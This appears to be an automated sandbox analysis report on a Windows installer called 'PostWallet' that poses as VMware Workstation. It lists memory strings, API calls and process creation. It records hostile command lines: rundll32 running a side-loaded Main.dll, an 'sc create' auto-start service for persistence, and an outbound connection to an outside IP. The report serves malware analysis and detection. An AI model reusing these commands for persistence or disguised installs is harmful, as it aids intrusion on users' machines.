          Source: Update.exe, 00000003.00000002.2060372901.00000000027A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: About to save shortcut: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VMware, Inc.\VMware Workstation.lnk (target C:\Users\user\AppData\Local\Post
          Source: PostWallet-1.0.0-full.nupkgBinary or memory string: lib/net48/vmwarebase.dll
          Source: FilePost?a.exe.3.drBinary or memory string: VMware Authorization Service
          Source: Update.exe, 00000003.00000002.2060372901.000000000280A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware Workstationp^!
          Source: Update.exe, 00000003.00000002.2060372901.000000000276A000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000008.00000002.3858357163.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOffline_HGFSSetWriteAccess
          Source: Update.exe, 00000003.00000002.2060372901.000000000280A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware Authorization Servicep^!
          Source: FilePost?a.exe.3.drBinary or memory string: Authorization and authentication service for starting and accessing virtual machinesVMware Authorization ServiceVMAuthdServiceSuccessfully registered %s.
          Source: Update.exe, 00000003.00000002.2060372901.000000000280A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: DCan't write shortcut: C:\Users\user\Desktop\VMware Workstation.lnkx.%
          Source: rundll32.exe, 0000000D.00000002.3859934007.000001D5874C4000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: .C:\Users\user\Desktop\VMware Workstation.lnk
          Source: Update.exe, 00000003.00000002.2060372901.000000000280A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ApplyReleasesImpl: About to save shortcut: C:\Users\user\Desktop\VMware Workstation.lnk (target C:\Users\user\AppData\Local\PostWallet\FilePost
          Source: FilePost?a.exe.3.drBinary or memory string: 599 vmware-authd PANIC: %s
          Source: Update.exe, 00000003.00000002.2060372901.000000000276A000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000008.00000002.3858357163.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOnlineRPC_HGFSSetHostDefaultCase
          Source: FilePost?a.exe, 00000004.00000002.3857637644.00000000030E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.b
          Source: FilePost?a.exe.3.drBinary or memory string: vmware-hostd
          Source: Update.exe, 00000003.00000002.2060372901.000000000276A000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000008.00000002.3858357163.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOnlineRPC_HGFSSetFollowSymlinks
          Source: Update.exe, 00000003.00000002.2060372901.000000000280A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: hC:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VMware, Inc\VMware Workstation.lnk
          Source: Update.exe, 00000003.00000002.2060372901.000000000276A000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000008.00000002.3858357163.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOffline_HGFSSetHostPath
          Source: Update.exe, 00000003.00000002.2060372901.000000000276A000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000008.00000002.3858357163.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOnlineQueryShared_HGFS
          Source: Squirrel-Install.log.3.drBinary or memory string: a.exe => C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VMware, Inc.\VMware Workstation.lnk
          Source: Squirrel-Install.log.3.drBinary or memory string: [07/03/24 10:47:20] info: ApplyReleasesImpl: About to save shortcut: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VMware, Inc.\VMware Workstation.lnk (target C:\Users\user\AppData\Local\PostWallet\FilePost
          Source: Update.exe, 00000003.00000002.2060372901.000000000280A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: .C:\Users\user\Desktop\VMware Workstation.lnkx.%
          Source: FilePost?a.exe.3.drBinary or memory string: vmware-vmx-debug.exe
          Source: Update.exe, 00000003.00000002.2060372901.000000000280A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: a.exe => C:\Users\user\Desktop\VMware Workstation.lnk2!
          Source: FilePost?a.exe.3.drBinary or memory string: File_CreateDirectoryvmwarebase.DLL)_strdup
          Source: FilePost?a.exe.3.drBinary or memory string: security.host.ruisslvmwareauthd.policy.allowRCForReadvmauthd.startupTimeoutgetpeername failed: %d tid %d
          Source: FilePost?a.exe, 00000008.00000002.3858357163.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOffline_VMCISetFiltering
          Source: FilePost?a.exe, 00000008.00000002.3858357163.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOffline_VMCISetPresent
          Source: Squirrel-Install.log.3.drBinary or memory string: a.exe => C:\Users\user\Desktop\VMware Workstation.lnk
          Source: FilePost?a.exe.3.drBinary or memory string: \\.\pipe\vmware-authdpipeCreateNamedPipe failed: %s (%d)
          Source: Update.exe, 00000003.00000002.2060372901.000000000276A000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000008.00000002.3858357163.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOnlineRPC_HGFSSetEnabled
          Source: FilePost?a.exe.3.drBinary or memory string: vmware-vmx.exe
          Source: Update.exe, 00000003.00000002.2060372901.00000000027A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AC:\Users\user\AppData\Local\PostWallet\app-1.0.0\vmwarebase.dll@
          Source: Update.exe, 00000003.00000002.2060372901.000000000276A000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000008.00000002.3858357163.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOffline_HGFSSetHostDefaultCase
          Source: rundll32.exe, 0000000D.00000002.3859644880.000001D5859EB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBn:
          Source: Update.exe, 00000003.00000002.2060372901.000000000276A000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000008.00000002.3858357163.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOnlineRPC_HGFSSetReadAccess
          Source: FilePost?a.exe.3.drBinary or memory string: VMware
          Source: Update.exe, 00000003.00000002.2060372901.000000000280A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: RC:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VMware, Inc.
          Source: Main.dll.8.drBinary or memory string: \VMware Workstation.lnk
          Source: FilePost?a.exe.3.drBinary or memory string: <description>"VMware Authorization Service"</description>
          Source: Update.exe, 00000003.00000002.2060372901.000000000276A000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000008.00000002.3858357163.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOffline_HGFSSetGuestName
          Source: FilePost?a.exe.3.drBinary or memory string: vmware-vmx.exe%s%c..%c%svmware-vmx-debug.exevmware-vmx-stats.exeNo ticket found
          Source: FilePost?a.exe.3.drBinary or memory string: VMware, Inc.1!0
          Source: Update.exe, 00000003.00000002.2060372901.000000000280A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Can't write shortcut: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VMware, Inc.\VMware Workstation.lnkx.%
          Source: Update.exe, 00000003.00000002.2060372901.000000000280A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: About to save shortcut: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VMware, Inc.\VMware Workstation.lnk (target C:\Users\user\AppData\Local\PostWallet\FilePost
          Source: Squirrel-Install.log.3.drBinary or memory string: [07/03/24 10:47:20] info: ApplyReleasesImpl: About to save shortcut: C:\Users\user\Desktop\VMware Workstation.lnk (target C:\Users\user\AppData\Local\PostWallet\FilePost
          Source: FilePost?a.exe, 00000008.00000002.3858357163.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOnlineQueryShared_VMCI
          Source: FilePost?a.exe, 00000008.00000002.3858357163.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: W32Util_GetVMwareGroupSid
          Source: rundll32.exe, 0000000D.00000002.3859644880.000001D585A85000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3859644880.000001D5859EB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: FilePost?a.exe.3.drBinary or memory string: VMware, Inc.1
          Source: FilePost?a.exe.3.drBinary or memory string: D:\build\ob\bora-20800274\bora\build\build\authd\release\win32\vmware-authd.pdb--
          Source: rundll32.exe, 0000000D.00000002.3859644880.000001D5859EB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sers\user\Desktop\VMware Workstation.lnk
          Source: Update.exe, 00000003.00000002.2060372901.00000000028F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: /lib/net48/vmwarebase.dll
          Source: FilePost?a.exe.3.drBinary or memory string: vmwarebase.DLL
          Source: FilePost?a.exe, 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000008.00000002.3858357163.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: HgfsEscape_GetSize
          Source: Update.exe, 00000003.00000002.2060372901.000000000276A000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000008.00000002.3858357163.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOnlineRPC_HGFSSetExpiration
          Source: Update.exe, 00000003.00000002.2060372901.000000000276A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AC:\Users\user\AppData\Local\PostWallet\app-1.0.0\vmwarebase.dll
          Source: Update.exe, 00000003.00000002.2060372901.00000000028F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: /LIB/NET48/VMWAREBASE.DLL
          Source: FilePost?a.exe, 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000008.00000002.3858357163.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: HgfsEscape_Do
          Source: Update.exe, 00000003.00000002.2060372901.000000000280A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: iC:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VMware, Inc.\VMware Workstation.lnk
          Source: Update.exe, 00000003.00000002.2060372901.000000000276A000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000008.00000002.3858357163.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOffline_HGFSSetReadAccess
          Source: FilePost?a.exe, 00000008.00000002.3858357163.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: AsyncSocket_ListenVMCI
          Source: Update.exe, 00000003.00000002.2060372901.000000000280A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 1998-2022 VMware, Inc.p^!
          Source: FilePost?a.exe.3.drBinary or memory string: VMware Server Console
          Source: FilePost?a.exe, 00000008.00000002.3858357163.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: AsyncSocket_ConnectVMCI
          Source: Update.exe, 00000003.00000002.2060372901.00000000027A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmwarebase.dll
          Source: FilePost?a.exe.3.drBinary or memory string: VMware Workstation
          Source: Update.exe, 00000003.00000002.2060372901.000000000276A000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000008.00000002.3858357163.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOffline_HGFSSetEnabled
          Source: Update.exe, 00000003.00000002.2060372901.00000000027A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: lib/net48/vmwarebase.dll0y
          Source: Update.exe, 00000003.00000002.2060372901.000000000276A000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000008.00000002.3858357163.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOffline_HGFSSetPresent
          Source: FilePost?a.exe.3.drBinary or memory string: OriginalFilenamevmware-authd.exeF
          Source: FilePost?a.exe.3.drBinary or memory string: : SSL RequiredNFCSSL supported/tServerDaemonProtocol:SOAPVMware%s Authentication Daemon Version %u.%u%s, %s, %s, %s, %s, %s%sError retrieving thumbprintInvalid arguments to '%s%s'Login failed: token key authentication not allowed.GET TOKEN KEY failed: got %s
          Source: Update.exe, 00000003.00000002.2062184970.000000001B8C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Users\user\Desktop\VMware Workstation.lnkDb
          Source: Update.exe, 00000003.00000002.2060372901.000000000280A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: a.exe => C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VMware, Inc.\VMware Workstation.lnk2!
          Source: FilePost?a.exeBinary or memory string: 599 vmware-authd PANIC: %s
          Source: Update.exe, 00000003.00000002.2060372901.000000000276A000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000008.00000002.3858357163.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOnlineRPC_HGFSSetHostPath
          Source: FilePost?a.exe.3.drBinary or memory string: http://www.vmware.com/0/
          Source: Update.exe, 00000003.00000002.2060372901.000000000276A000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000008.00000002.3858357163.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOffline_HGFSSetFollowSymlinks
          Source: FilePost?a.exe, 00000008.00000002.3858357163.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOffline_VMCISetID
          Source: FilePost?a.exe.3.drBinary or memory string: nfcnfcsslvmware-hostdPROXY service %s not found.USER too long.Password required for %s.Login with USER first.InSeCuRePassword not understood.User %s logged in.LOGIN FAILURE from %.128s, %s
          Source: FilePost?a.exe, 00000008.00000002.3858357163.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOffline_VMCISetUnrestricted
          Source: FilePost?a.exe, 00000004.00000002.3857637644.00000000030BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\vmwarebase.DLLfYZ
          Source: FilePost?a.exe.3.drBinary or memory string: ProductNameVMware WorkstationP
          Source: Update.exe, 00000003.00000002.2060372901.000000000280A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.p^!
          Source: Update.exe, 00000003.00000002.2060372901.000000000276A000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000008.00000002.3858357163.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOnlineQuery_HGFS
          Source: Update.exe, 00000003.00000002.2060372901.000000000276A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: lib\net48\vmwarebase.dll
          Source: Update.exe, 00000003.00000002.2060372901.000000000280A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: About to save shortcut: C:\Users\user\Desktop\VMware Workstation.lnk (target C:\Users\user\AppData\Local\PostWallet\FilePost
          Source: FilePost?a.exe.3.drBinary or memory string: FileDescriptionVMware Authorization ServiceL
          Source: Update.exe, 00000003.00000002.2060372901.000000000276A000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000008.00000002.3858357163.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOnlineRPC_HGFSSetGuestName
          Source: Update.exe, 00000003.00000002.2060372901.000000000280A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: QC:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VMware, Inc
          Source: FilePost?a.exe, 00000008.00000002.3858357163.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOffline_QueryVMCI
          Source: FilePost?a.exe.3.drBinary or memory string: 1998-2022 VMware, Inc.J
          Source: FilePost?a.exe, 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000008.00000002.3858357163.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: HgfsEscape_Undo
          Source: Update.exe, 00000003.00000002.2060372901.000000000280A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: QC:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VMware, IncX
          Source: FilePost?a.exe.3.drBinary or memory string: vmware-vmx-stats.exe
          Source: Update.exe, 00000003.00000002.2060372901.000000000276A000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000008.00000002.3858357163.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOffline_HGFSSetTags
          Source: FilePost?a.exe, 00000004.00000002.3857637644.00000000030DC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _VMware_x
          Source: FilePost?a.exe.3.drBinary or memory string: User not authorized for vpx agent contactvmware-vpxaUser not authorized for vmx contactConnecting socket=%s
          Source: FilePost?a.exe, 00000008.00000002.3858357163.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOffline_VMCISetPciSlotNumber
          Source: Update.exe, 00000003.00000002.2060372901.00000000028F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 0http://defaultcontainer/lib/net48/vmwarebase.dll
          Source: FilePost?a.exe.3.drBinary or memory string: Invalid pathname (too long)Config file not found: %sVMware Server ConsoleYou need read access in order to connect with the %s. Access denied for config file: %sYou need execute access in order to connect with the %s. Access denied for config file: %s%s-fdConnect %sError connecting to %s service instance.Can't create mutex '%s' (%d)Timeout acquiring thread lock.-fdCould not open %s process %d. (error %d)Error connecting to vmx process.No such %s process: %s
          Source: Update.exe, 00000003.00000002.2060372901.000000000276A000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000008.00000002.3858357163.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOffline_HGFSSetExpiration
          Source: FilePost?a.exe, 00000008.00000002.3858357163.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: W32Util_GetVmwareCommonAppDataFilePath
          Source: Update.exe, 00000003.00000002.2060372901.000000000276A000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000008.00000002.3858357163.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VigorOnlineRPC_HGFSSetPresent
          Source: Update.exe, 00000003.00000002.2060372901.000000000280A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc
          Source: FilePost?a.exe.3.drBinary or memory string: vmware-vpxa
          Source: FilePost?a.exe.3.drBinary or memory string: D:\build\ob\bora-20800274\bora\build\build\authd\release\win32\vmware-authd.pdb
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe - Process information queried: ProcessInformation
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exe - Code function: 4_2_00ED8F80 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00ED8F80
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exe - Code function: 4_2_6CF937F3 mov eax, dword ptr fs:[00000030h] 4_2_6CF937F3
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exe - Code function: 4_2_6CF89141 mov eax, dword ptr fs:[00000030h] 4_2_6CF89141
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exe - Code function: 4_2_6CF9494E GetProcessHeap,4_2_6CF9494E
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exe - Code function: 4_2_00ED90E3 SetUnhandledExceptionFilter,4_2_00ED90E3
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exe - Code function: 4_2_00ED84CB SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00ED84CB
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exe - Code function: 4_2_6CF7855E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_6CF7855E
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exe - Code function: 4_2_6CF8300E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_6CF8300E
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exe - Code function: 4_2_6CF78334 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_6CF78334
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exe - Code function: 4_2_6E39F81F SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_6E39F81F
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe - Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Windows\System32\rundll32.exe - Network Connect: 3.5.232.137 443
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exe - Code function: 4_2_6CF54A50 ShellExecuteExW,WaitForSingleObject,CloseHandle,GetClassNameW,lstrcmpW,ShowWindow,4_2_6CF54A50
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe - Process created: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exe "C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exe" --squirrel-firstrun
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exe - Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C rundll32.exe "C:\Users\user\AppData\Local\PostWallet\app-1.0.0\Main.dll", ServiceCrtMain
          Source: C:\Windows\SysWOW64\cmd.exe - Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\PostWallet\app-1.0.0\Main.dll", ServiceCrtMain
          Source: C:\Windows\System32\rundll32.exe - Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C sc create ClassicShellSV binPath= "C:\Program Files\Classic Shell\ClassicIE_64.exe" start= auto
          Source: C:\Windows\System32\cmd.exe - Process created: C:\Windows\System32\sc.exe sc create ClassicShellSV binPath= "C:\Program Files\Classic Shell\ClassicIE_64.exe" start= auto
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exe - Code function: 4_2_00ED82D0 InitializeSecurityDescriptor,malloc,InitializeAcl,AllocateAndInitializeSid,IsValidSid,AddAccessAllowedAce,GetAce,GetAce,SetSecurityDescriptorDacl,Warning,SetFileSecurityW,Warning,FreeSid,free,free,4_2_00ED82D0
          Source: ClassicIE_64.dll.13.dr - Binary or memory string: bn2.txtShell_TrayWnd
          Source: ClassicStartMenuDLL.dll.13.dr - Binary or memory string: desktop::{031E4825-7B94-4DC3-B131-E946B44C8DD5}libraries::{20D04FE0-3AEA-1069-A2D8-08002B30309D}computeropenMenu.MenuExitExitEnableExitMenu.MenuHelpHelpMenu.MenuSettingsSettingsMenu.OpenAllO&pen All UsersMenu.Open&OpenMenu.ExplorerWindows ExplorerExplorerPathEnableExplorerShiftRightStartHoverDelayHoverAllProgramsDelayMiddleClickEnableSettingsShiftClickSkipMetroApplicationManager_DesktopShellWindowButtonMSTaskSwWClassReBarWindow32ClassicStartMenuDLL.dllProgmanCrashDumpCompatibilityFixesStartMenu DLL: InitStartMenuDLLuser32.dllSetWindowCompositionAttributecomctl32.dllDrawThemeTextExDrawThemeTextuxtheme.dllDrawThemeBackground#32770gdi32.dllStretchDIBitsapi-ms-win-shlwapi-winrt-storage-l1-1-1.dllshlwapi.dllshlwapi.dlldwmapi.dlldwmapi.dll"
          Source: ClassicIE_64.dll.13.dr - Binary or memory string: ;Shell_TrayWndH
          Source: ClassicStartMenuDLL.dll.13.dr - Binary or memory string: %s\CSM_Crash%d.dmpMiniDumpWriteDumpdbghelp.dll%LOCALAPPDATA%Shell_TrayWndClockButtonTrayClockWClassToolbarWindow32Shell_SecondaryTrayWndWSMHotkeyCSMHotkeyShiftWinHideUserPicDesktop More Programs PaneDesktop Open Pane HostDV2ControlHostTaskbarColorTaskbarOpacityTaskbarLookTaskbarTextColorCustomTaskbarshell:::{2559a1f8-21d7-11d4-bdaf-00c04f60b9f0}ImmersiveStartBackgrounduxtheme.dll"
          Source: ClassicExplorer32.dll.13.dr, ClassicExplorer64.dll.13.dr - Binary or memory string: ProgmanCabinetWClass
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exe - Code function: 4_2_00ED8D9F cpuid 4_2_00ED8D9F
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exe - Code function: GetLocaleInfoW,4_2_6CF96DEB
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exe - Code function: EnumSystemLocalesW,4_2_6CF8EF3A
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exe - Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,4_2_6CF96F11
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: GetLocaleInfoW,4_2_6CF96980
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: EnumSystemLocalesW,4_2_6CF96A72
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: EnumSystemLocalesW,4_2_6CF96A27
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,4_2_6CF96B98
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: EnumSystemLocalesW,4_2_6CF96B0D
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,4_2_6CF96785
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,4_2_6CF970E6
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: GetLocaleInfoW,4_2_6CF97017
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: GetLocaleInfoW,4_2_6CF8F3FF
          Source: C:\Windows\System32\rundll32.exeCode function: GetUserDefaultUILanguage,GetLocaleInfoW,13_2_00415230
          Source: C:\Windows\System32\rundll32.exeCode function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,13_2_004142E0
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe Queries volume information: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe VolumeInformation
